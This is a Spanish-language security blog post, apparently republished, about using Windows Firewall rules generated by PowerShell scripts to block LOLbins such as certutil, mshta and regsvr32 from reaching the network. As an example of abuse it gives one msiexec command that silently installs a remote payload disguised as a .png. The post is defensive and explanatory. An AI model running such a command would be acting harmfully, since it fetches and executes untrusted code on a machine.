Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET Mastodon

Entradas populares

PostHeaderIcon Bloquear LOLbins con el firewall de Windows


Hoy en día, muchos tipos de malware y troyanos de acceso remoto (RAT) y APTs utilizan archivos binarios integrados de Windows para preparar e infectar computadoras. Los programas comúnmente utilizados en este tipo de ataques son powershell.exe, regsvr32, rundll32, certreq.exe, certutil.exe y mshta.exe.

 


 

 

Los binarios de Living of the Land (LOLbins) evitan protecciones como AppLocker, ya que residen en la carpeta de Windows y/o están diseñados en código por Microsoft. Un ejemplo es:

msiexec /q /i http://192.168.100.3/tmp/cmd.png

En el proyecto LOLBAS se puede encontrar una excelente descripción general de cómo se puede "abusar" de los archivos binarios integrados para descargar o ejecutar código. 

Para obtener más información sobre como estas herramientas son utilizadas por delincuentes y APTs, se puede consultar este artículo de Cynet




 

Estos script de PowerShell crean nuevas reglas de firewall que bloquean el acceso a la red de LOLbin, archivos binarios legales del sistema operativo y comúnmente utilizados para llevar adelantes ataques.

En resumen, los scripts evitan que las utilidades integradas de Windows accedan a Internet. Por ejemplo, en la mayoría de las circunstancias, usar expand.exe para acceder a un archivo remoto es extremadamente improbable y definitivamente estaría mal visto si fuera necesario por razones legítimas.

Estas listas de bloqueo deben usarse con cuidado porque el sistema operativo podría verse afectado:

Sería mejor implementar herramientas como Attack Surface Reduction rulesAdvanced Windows Defender featuresArbitary Code GuardExploit Protection, las cuales deberían utilizarse para brindar una mejor protección. Sin embargo, estas reglas se pueden utilizar en lugar de esas tecnologías para ofrecer cierta protección básica.

Créditos:

Fuentes:

https://blog.segu-info.com.ar/2023/12/bloquear-lolbins-con-el-firewall-de.html


0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.